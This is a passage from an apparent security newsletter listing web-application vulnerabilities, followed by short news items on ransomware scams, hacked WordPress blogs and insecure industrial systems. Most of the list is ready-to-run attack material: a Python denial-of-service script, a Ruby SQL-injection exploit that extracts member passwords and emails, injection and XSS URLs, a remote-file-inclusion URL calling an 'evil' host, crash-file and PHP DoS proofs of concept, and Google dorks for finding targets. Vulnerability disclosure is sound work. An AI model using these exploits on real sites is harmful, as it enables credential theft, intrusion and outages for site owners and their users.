   domain=raw_input(“[+]Ex: www.site.com<http://www.site.com>:”)
   url =’http://’+domain+’/misc.php?show=latestposts&vsacb_resnr=10000000′
   res = urllib.urlopen(url).read(200)
   phpmem= re.findall(‘of (.*?)bytes.*?’,res)
   bytes=int(phpmem[0])
   mb=bytes/1048576
   print ‘[+]Server php memmory is:’+str(mb)+’ MB’
   print “[+]Enter the No of request you wann send:”
   kill=raw_input(“Some 20-30 will be enough:”)
   try:
   for i in range(1,int(kill)):
   print i
   res1 = urllib.urlopen(url).read(200)
   print res1
   except(IOError),msg: print “Server will be FCUK’ed by now”
9. MKPortal Contact module is subject to a Cross Site Scripting (XSS) vulnerability. Example URLs are available:

   http://www.sample.com/contact/index.php?blocks=%3Cscript%3Ealert(1)%3C/script%3E

   http://www.sample.com/contact/mail.php?to=1@1.1&mess=2&subj=3&headers=4&name=5&teme=6&soob=7&email=2@2.2&output=%3Cscript%3Ealert(1)%3C/script%3E

   http://www.sample.com/contact/mail.php?to=1@1.1&mess=2&subj=3&headers=4&name=5&teme=6&soob=7&email=2@2.2&blocks=%3Cscript%3Ealert(1)%3C/script%3E

10. OnePC mySite Management Software is subject to a SQL Injection vulnerability. Example URL is available: http://www.sample.com/index.php?view=docs&doc_id=XX+AND+1=2+UNION+SELECT+concat(user()),concat(user()),concat(user()),concat(user()),5–
11. Elite Gaming Ladders is subject to a SQL Injection vulnerability. Versions older than 3.5 are impacted, though others may be as well. Exploit code is available:
    #!/usr/bin/ruby
    #4004-security-project.com
    #Discovered and vulnerability by Easy Laster
    print ”
    #########################################################
    #                   4004-Security-Project               #
    #########################################################
    #        Elite Gaming Ladders <= v3.5 SQL injection     #
    #                          Exploit                      #
    #                     Using Host+Path                   #
    #                    www.demo.de /forum/ 1              #
    #                         Easy Laster                   #
    #########################################################
    ”
    require ‘net/http’
    print “#########################################################”
    print “\nEnter host name (site.com)->”
    host=gets.chomp
    print “#########################################################”
    print “\nEnter script path (/forum/)->”
    path=gets.chomp
    print “#########################################################”
    print “\nEnter script path (userid)->”
    userid=gets.chomp
    print “#########################################################”
    begin
    dir = “matchdb.php?match=9999999+and+1=0+union+select+1,2,3,4,5,concat(0×23,0×23,0×23,0×23,0×23,name,0×23,0×23,0×23,0×23,0×23),7+from+members+where+id=”+ userid +”–”
    http = Net::HTTP.new(host, 80)
    resp= http.get(path+dir)
    print “\nid -> “+(/#####(.+)#####/).match(resp.body)[1]
    dir = “matchdb.php?match=9999999+and+1=0+union+select+1,2,3,4,5,concat(0×23,0×23,0×23,0×23,0×23,password,0×23,0×23,0×23,0×23,0×23),7+from+members+where+id=”+ userid +”–”
    http = Net::HTTP.new(host, 80)
    resp= http.get(path+dir)
    print “\npassword -> “+(/#####(.+)#####/).match(resp.body)[1]
    dir = “matchdb.php?match=9999999+and+1=0+union+select+1,2,3,4,5,concat(0×23,0×23,0×23,0×23,0×23,email,0×23,0×23,0×23,0×23,0×23),7+from+members+where+id=”+ userid +”–”
    http = Net::HTTP.new(host, 80)
    resp= http.get(path+dir)
    print “\nEmail -> “+(/#####(.+)#####/).match(resp.body)[1]
    print “\n#########################################################”
    rescue
    print “\nExploit failed”
    end
12. HotNews is subject to a Remote File Inclusion (RFI) vulnerability. Version 0.7.2 is impacted, though others may be as well. Google Dork inurl:hnmain.inc.php.  Example URL is available: http://www.sample.com/includes/hnmain.inc.php3?config[incdir]=http://evil/cmd.gif???
13. IE/Opera source code viewer is subject to a Null Character Handling vulnerability. The vulnerability in the source code viewer in both browsers (IE & Opera) is when they are processing the null control character (0×00), including this character in the transmission message results in a misunderstanding that is reflected in the concealment of the transmitted message, only the code that is between valid tags is shown. In other words, exploiting this vulnerability we can completely hide the source code to the user of Internet Explorer and Opera browsers. Proof of Concept code is available:
    <?php
    echo “\x00″;
    ?>
    Esto es un mensaje oculto
    This is a hidden message
    Este es otro
    This is another one
    …
    Como vemos podemos esconder cualquier mensaje
    As we can see we can hide any message
    <html>
    <head>
    <title>Titulo</title>
    </head>
    <body>
    <h1>Hola mundo</h1>
    </body>
    </html>

    And the next,only hide part of the code (The script part)
    <html>
    <head>
    <title>Titulo</title>
    </head>
    <body>
    <h1>Hello world</h1>
    </body>
    </html>
    <?php
    echo chr(0);
    ?>
    <script>alert(‘This code is never seen’);</script>

14. Worldviewer.com CMS is subject to a SQL Injection vulnerability. Google Dork inurl:”php/showContent.php?linkid=” or inurl:”/php/showNews.php?newsid=”.  Example URL is available:

    http://www.sample.com/php/showNews.php?newsid=-5+union+select+all+1,version()–

    http://www.sample.com/php/showContent.php?linkid=-5+union+select+all+version()–

15. YaPig is subject to a Remote File Inclusion (RFI) vulnerability. Version 0.94.0u is impacted, though others may be as well.  Example URL is available:

    http://www.sample.com/last_gallery.php?YAPIG_PATH={Shell}

16. Aladdin eToken PKI Client is subject to a Virtual File Handling Unspecified Memory Corruption vulnerability. Version 4.5.52 is impacted, though others may be as well.  Exploit code is available:
    #!/usr/bin/perl -w
    # Summary: The eToken PKI Client is the software that enables eToken USB operation and the
    # implementation of eToken PKI-based solutions. These solutions include certificate-based
    # strong two-factor authentication, encryption and digital signing. With the PKI Client your
    # PKI solutions become highly secure, extremely convenient and portable, as you can easily and
    # securely generate and store PKI keys on-board eToken smart card-based devices.
    #
    # Vendor: Aladdin Knowledge Systems Ltd.
    # Product web page: http://www.aladdin.com
    #
    # Version tested: 4.5.52
    # Tested on Microsoft Windows XP Professional SP3 (EN)
    #
    #
    #
    # ===================================================================================
    #
    # (154c.a74): Access violation – code c0000005 (first chance)
    # First chance exceptions are reported before any exception handling.
    # This exception may be expected and handled.
    # eax=00000000 ebx=00000000 ecx=00000000 edx=01730002 esi=00000000 edi=0012fc90
    # eip=0045d3d3 esp=001282b0 ebp=00128304 iopl=0         nv up ei pl nz na po nc
    # cs=001b  ss=0023  ds=0023  es=0023  fs=003b  gs=0000             efl=00010202
    # *** ERROR: Module load completed but symbols could not be loaded for etProps.exe
    # etProps+0x5d3d3:
    # 0045d3d3 8b8ea4000000    mov     ecx,dword ptr [esi+0A4h] ds:0023:000000a4=????????
    #
    # ===================================================================================
    #
    #
    #
    # Vulnerability discovered by Gjoko ‘LiquidWorm’ Krstic
    #
    # Zero Science Lab – http://www.zeroscience.mk
    #
    # liquidworm gmail com

    $fajl = “Aladdin.etv”; # eToken Virtual file

    $djubre = “\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41″.
    “\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41″.
    “\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41″.
    “\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41″.
    “\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41″;

    open etv, “>./$fajl” || die “\nCan’t open $fajl: $!”;
    print etv $djubre x 100;
    print “\n [o] Writing to file…\n”;
    sleep 1;
    close etv;
    print “\n [o] File $fajl created.\n”;

17. PHP getopt() is subject to a Virtual File Handling Unspecified Memory Corruption vulnerability. Version 5.3.0 is impacted, though others may be as well.  Exploit code is available:
    <?php
    #####################################################################
    ## PHP 5.3.0 getopt() Denial of service
    ## Tested on WIN XP FR SP3, WIN VISTA FR SP2, Apache, PHP 5.3.0
    ## Denial of service
    ## Author: Napst3r
    ## Greets To: My Laptop &  all My Friends
    #####################################################################

    $buffer  = str_repeat(‘A:’, 9999);
    $options = getopt($buffer);

    ?>

Stories of Interest:
News item 1:  Scammers began distributing ransomware targeting BitTorrent users and claiming alleged piracy violations. The delivered ransomware dishes up an alarming alert message:

Warning! Piracy detected!
Pirated content was detected on your PC!

The message goes on to state “Copyright fund has recieved report and has started an investigation. You’ll recieve subopena in a week”. (Misspellings are compliments of the attackers).  In an ironic twist, included in the message are copyright-infringing logos belonging to the RIAA, MPAA and others. The alert message leads to iccp-online.com, a now defunct scam site that claims to be “a  law firm which specialises in assisting intellectual property rights holders exploit and enforce their rights globally.”  The scam attempts to trick victims into paying “…damages, as well as a fine and procedural expenses”  to the tune of $399.85.

News item 2:http://www.darkreading.com/database_security/security/attacks/showArticle.jhtml?articleID=224300052&cid=RSSfeed

Hundreds of WordPress blogs were hacked during the past few weeks by attackers who pilfered blogger credentials stored in plain text in the database.

The researchers who discovered the attacks say a design flaw in the WordPress blogging platform was the underlying problem because by default it allows users to set up permissions that let anyone read their blog’s wp-config.php file configuration files, and because WordPress stores the bloggers’ credentials in plain text.

The attackers injected malicious iFrames into the blogs so that any visitors would automatically be infected with malware, including code that spreads fake antivirus software.

WordPress, meanwhile, says it hasn’t seen any evidence that the attacks were related to a security problem with its software. Barry Abrahamson, systems wrangler for WordPress, says the attacks appear to have targeted weak file permissions. “File-level permissions and Web server security are the responsibility of the hosting environment, not the application,” Abrahamson says. “WordPress can be installed a number of ways, and many hosts have built custom installers. I am not sure how WordPress was installed in these cases.”

If a blogger wants to check if his site was hacked, then he should look for extra HTML in the header and view the source for any iFrames pointing to http://mainnetsoll.com/grep or http://networkads.net/grep, he says. “They can [also] try installing the WordPress Exploit Scanner plug-in,” Abrahamson says. “The database scan portion of this plug-in should catch if a malicious iFrame code has been inserted into the options table in their database.”  Contact your hosting provider if you find either of these issues, he adds, and ensure you’re running WordPress 2.9.2. The good news is the attacks were not as malicious as they could have been.

News item 3: http://www.embedded.com/columns/breakpoint/224202612
Governors and others frequently bemoan the lack of investment being made in crumbling infrastructure. Bridges, tunnels and the rest of the brick and mortar that enables our lives are in disrepair, and we’re told things are getting worse. Shrinking budgets insure that repairs will continue to fall behind. Pundits also say the electric grid is old and not capable of meeting 21st century needs.

Industrial automation equipment often runs for decades or longer. Years ago, when working on a system in a steel mill there was a huge motor stamped with a manufacturing date of 1899. It was still in service. The electronics, too, often runs for decades.

That’s a testament to great engineering and manufacturing, and is also potentially a great hazard. These systems were largely designed before security became an important issue. Many have been almost haphazardly connected to the Internet in the intervening years, when management sees the ‘net as an easy way to monitor remotely and save money.

In 2003 a worm shut down all safety monitoring on an Ohio nuke plant for five hours. Vancouver’s traffic lights have been compromised. A 14-year-old turned the Polish city of Lodz’s trams into his own giant train set, derailing four cars and injuring at least a dozen people.